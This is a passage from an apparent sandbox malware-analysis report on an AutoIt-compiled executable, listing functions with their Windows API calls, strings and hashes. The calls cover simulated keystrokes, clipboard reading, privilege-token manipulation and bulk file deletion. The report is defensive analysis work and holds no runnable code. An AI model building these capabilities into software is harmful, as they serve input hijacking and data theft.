                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EBFD87
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EBFE1C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                        • API String ID: 2516578528-4164748364
                                                                                                                        • Opcode ID: 636b1e45f2b2930bdccf36d25fef2335797e475a385e87941b6f9e29088ff01a
                                                                                                                        • Instruction ID: bd8ccbff8e4ce5da391e49cf7bacfdb450af97e5ed1dba4fb0991163646d18bd
                                                                                                                        • Opcode Fuzzy Hash: 636b1e45f2b2930bdccf36d25fef2335797e475a385e87941b6f9e29088ff01a
                                                                                                                        • Instruction Fuzzy Hash: E9328A71204206AFDB10DF68CC84AEBBBE5FB48358F145629FA65A72B1D730DC44CB91
                                                                                                                        Function 00EBA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EBAFDB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                        • API String ID: 3850602802-328681919
                                                                                                                        • Opcode ID: 5b302e2523975204c72996a8012083915ff2de0f98190d5733a5c405bfcdaa6d
                                                                                                                        • Instruction ID: 5fed729fce4408541808f381ea1423956044efcbeb27b738fae1fd4c63d88ca0
                                                                                                                        • Opcode Fuzzy Hash: 5b302e2523975204c72996a8012083915ff2de0f98190d5733a5c405bfcdaa6d
                                                                                                                        • Instruction Fuzzy Hash: C712DDB1604204AFEF259F25EC49FEB7BE8EB45314F18522AF519FA290DB708941CB52
                                                                                                                        Function 00E6F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00E6F796
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC4388
                                                                                                                        • IsIconic.USER32(000000FF), ref: 00EC4391
                                                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00EC439E
                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EC43A8
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EC43BE
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EC43C5
                                                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00EC43D1
                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EC43E2
                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EC43EA
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EC43F2
                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EC43F5
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC440A
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EC4415
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC441F
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EC4424
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC442D
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EC4432
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC443C
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EC4441
                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EC4444
                                                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00EC446B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                        • Opcode ID: 45558aacf2b4f1079e627f4a5ebedaf6b8ff5c7a7df83dc7a40d26f8eb1a15ff
                                                                                                                        • Instruction ID: 1b30b827ed95c3e4f381f4c7f4cbdc7ca7464492e7cb42292db43f5d5d588770
                                                                                                                        • Opcode Fuzzy Hash: 45558aacf2b4f1079e627f4a5ebedaf6b8ff5c7a7df83dc7a40d26f8eb1a15ff
                                                                                                                        • Instruction Fuzzy Hash: 603196B1A44318BFEB215B76AC49FBF3F6CEB44B54F11401AFA05F61D0C6B19D01AAA0
                                                                                                                        Function 00E5BDF0 Relevance: 35.6, APIs: 12, Strings: 8, Instructions: 643COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00F122E8,?,00000000,?,00E53E2E,?,00000000,?,00EEDBF0,00000000,?), ref: 00E5BE8B
                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00E53E2E,?,00000000,?,00EEDBF0,00000000,?,00000002), ref: 00E5BEA7
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E5BF19
                                                                                                                          • Part of subcall function 00E7297D: __wsplitpath_helper.LIBCMT ref: 00E729BD
                                                                                                                        • _wcscpy.LIBCMT ref: 00E5BF31
                                                                                                                        • _wcscat.LIBCMT ref: 00E5BF46
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E5BF56
                                                                                                                        • _wcscpy.LIBCMT ref: 00E5C03E
                                                                                                                        • _wcscpy.LIBCMT ref: 00E5C1ED
                                                                                                                        • SetCurrentDirectoryW.KERNEL32 ref: 00E5C250
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                          • Part of subcall function 00E5C320: _memmove.LIBCMT ref: 00E5C419
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                                                                                                        • API String ID: 2542276039-689609797
                                                                                                                        • Opcode ID: b5854c890909d33895dc5d9134379e0cd1c290b32ff6d50ec3dcb87db08e5216
                                                                                                                        • Instruction ID: fef5f8e1c397f098d0bab3293bf245628305b013588937500d4bc549c756a972
                                                                                                                        • Opcode Fuzzy Hash: b5854c890909d33895dc5d9134379e0cd1c290b32ff6d50ec3dcb87db08e5216
                                                                                                                        • Instruction Fuzzy Hash: B642B3715083459FD710DF60C851BABB7E8AF84304F14AD2DF989A7292DB31EA49CB93
                                                                                                                        Function 00E8B9F1 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8BF0F
                                                                                                                          • Part of subcall function 00E8BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E8BF3C
                                                                                                                          • Part of subcall function 00E8BEC3: GetLastError.KERNEL32 ref: 00E8BF49
                                                                                                                        • _memset.LIBCMT ref: 00E8BA34
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E8BA86
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E8BA97
                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E8BAAE
                                                                                                                        • GetProcessWindowStation.USER32 ref: 00E8BAC7
                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00E8BAD1
                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E8BAEB
                                                                                                                          • Part of subcall function 00E8B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E8B9EC), ref: 00E8B8C5
                                                                                                                          • Part of subcall function 00E8B8B0: CloseHandle.KERNEL32(?,?,00E8B9EC), ref: 00E8B8D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                        • String ID: $default$winsta0
                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                        • Opcode ID: 67e56488fd23844b7b95c1d9aa92f5adb839e9d618b707e8febf395423a7060d
                                                                                                                        • Instruction ID: 1656cdcaca1b584190075c8b3f746dab69c0cb8a3412227234c8d488d93891ff
                                                                                                                        • Opcode Fuzzy Hash: 67e56488fd23844b7b95c1d9aa92f5adb839e9d618b707e8febf395423a7060d
                                                                                                                        • Instruction Fuzzy Hash: 36817B71901208AFDF11AFA4DD45AEEBBB9EF08308F04515AF92CB6161DB318E15EB60
                                                                                                                        Function 00E96B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                          • Part of subcall function 00E97B9F: __wsplitpath.LIBCMT ref: 00E97BBC
                                                                                                                          • Part of subcall function 00E97B9F: __wsplitpath.LIBCMT ref: 00E97BCF
                                                                                                                          • Part of subcall function 00E97C0C: GetFileAttributesW.KERNEL32(?,00E96A7B), ref: 00E97C0D
                                                                                                                        • _wcscat.LIBCMT ref: 00E96B9D
                                                                                                                        • _wcscat.LIBCMT ref: 00E96BBB
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E96BE2
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E96BF8
                                                                                                                        • _wcscpy.LIBCMT ref: 00E96C57
                                                                                                                        • _wcscat.LIBCMT ref: 00E96C6A
                                                                                                                        • _wcscat.LIBCMT ref: 00E96C7D
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E96CAB
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00E96CBC
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E96CDB
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E96CEA
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00E96CFF
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00E96D10
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E96D37
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E96D53
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E96D61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 1867810238-1173974218
                                                                                                                        • Opcode ID: 67cb7fc186c96b4957f815dd4e1e5f3a1f9827717ccdfc40e6391723ef491bef
                                                                                                                        • Instruction ID: 70d9eab3e5f2227b565140da3cf9d488e86b32a731afc82b4b641830dd3b69bc
                                                                                                                        • Opcode Fuzzy Hash: 67cb7fc186c96b4957f815dd4e1e5f3a1f9827717ccdfc40e6391723ef491bef
                                                                                                                        • Instruction Fuzzy Hash: 3B512B72905228AACF21EBA0DC84AEE77BCAF09304F4455D7E559B2041EB309B8D8B61
                                                                                                                        Function 00EA7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32(00EEDBF0), ref: 00EA70C3
                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EA70D1
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00EA70D9
                                                                                                                        • CloseClipboard.USER32 ref: 00EA70E5
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EA7101
                                                                                                                        • CloseClipboard.USER32 ref: 00EA710B
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EA7120
                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00EA712D
                                                                                                                        • GetClipboardData.USER32(00000001), ref: 00EA7135
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EA7142
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EA7176
                                                                                                                        • CloseClipboard.USER32 ref: 00EA7283
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3222323430-0
                                                                                                                        • Opcode ID: fbaf951166c31d5ade660283189c3e6cb5760c64f2ba602002a453ca3427ab3d
                                                                                                                        • Instruction ID: b414cb8f09cc213f8c26dafb39ff37815faf781c8b759bb5de73d1aa570d67f1
                                                                                                                        • Opcode Fuzzy Hash: fbaf951166c31d5ade660283189c3e6cb5760c64f2ba602002a453ca3427ab3d
                                                                                                                        • Instruction Fuzzy Hash: FC51C37120C2016FD310EB65EC95F6E77E8EB89B01F00552AF596F61E1DB70E9098B62
                                                                                                                        Function 00E9FDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E9FE03
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E9FE57
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E9FE7C
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E9FE93
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E9FEBA
                                                                                                                        • __swprintf.LIBCMT ref: 00E9FF06
                                                                                                                        • __swprintf.LIBCMT ref: 00E9FF3F
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • __swprintf.LIBCMT ref: 00E9FF93
                                                                                                                          • Part of subcall function 00E7234B: __woutput_l.LIBCMT ref: 00E723A4
                                                                                                                        • __swprintf.LIBCMT ref: 00E9FFE1
                                                                                                                        • __swprintf.LIBCMT ref: 00EA0030
                                                                                                                        • __swprintf.LIBCMT ref: 00EA007F
                                                                                                                        • __swprintf.LIBCMT ref: 00EA00CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                        • API String ID: 108614129-2428617273
                                                                                                                        • Opcode ID: fa8610538c1cd7b0cc4c178fd061d8ff066a5180b8ae8b5d9c991f81f023c39c
                                                                                                                        • Instruction ID: 47f77f4b3890a407d1cd5f27e71cde6a63544f569368cd50a6a2426bf856e698
                                                                                                                        • Opcode Fuzzy Hash: fa8610538c1cd7b0cc4c178fd061d8ff066a5180b8ae8b5d9c991f81f023c39c
                                                                                                                        • Instruction Fuzzy Hash: 94A13F72408344ABC710EBA4CC91DAFB7ECAF94701F44181EF695E6152EB34EA09CB62
                                                                                                                        Function 00EA2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00EA2065
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA207A
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2091
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00EA20A3
                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00EA20BD
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EA20D5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA20E0
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EA20FC
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2123
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA213A
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA214C
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00F03A68), ref: 00EA216A
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EA2174
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA2181
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA2191
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1803514871-438819550
                                                                                                                        • Opcode ID: 240e46a0de8836efb28ff3b38e0b721234e9d7dd061e7374e23416b9505ab75b
                                                                                                                        • Instruction ID: 0736a6fe27969c74ab1070abf77a7cb82ee038690470661814efbc2ee52cee27
                                                                                                                        • Opcode Fuzzy Hash: 240e46a0de8836efb28ff3b38e0b721234e9d7dd061e7374e23416b9505ab75b
                                                                                                                        • Instruction Fuzzy Hash: 4331B5326062197FCB20DBB9EC48EDE77ACDF0A314F14509AFA15F6090DB74EA44DA60
                                                                                                                        Function 00EA219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00EA21C0
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA21D5
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA21EC
                                                                                                                          • Part of subcall function 00E97606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E97621
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EA221B
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA2226
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EA2242
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2269
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2280
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA2292
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00F03A68), ref: 00EA22B0
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EA22BA
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA22C7
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA22D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1824444939-438819550
                                                                                                                        • Opcode ID: db7514add90b8d92f1a4116cc07de71fc9c353952726b20963098474c4f51ee7
                                                                                                                        • Instruction ID: 9abe7e64920ed89d02e1324930a9a89dfb826a1a1676ebd95ea132e2a72eae38
                                                                                                                        • Opcode Fuzzy Hash: db7514add90b8d92f1a4116cc07de71fc9c353952726b20963098474c4f51ee7
                                                                                                                        • Instruction Fuzzy Hash: B731D6325062196ECF20DBA8EC48FDE77ACDF0A324F145159FA14B60E0D774EA85DA74
                                                                                                                        Function 00E56BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
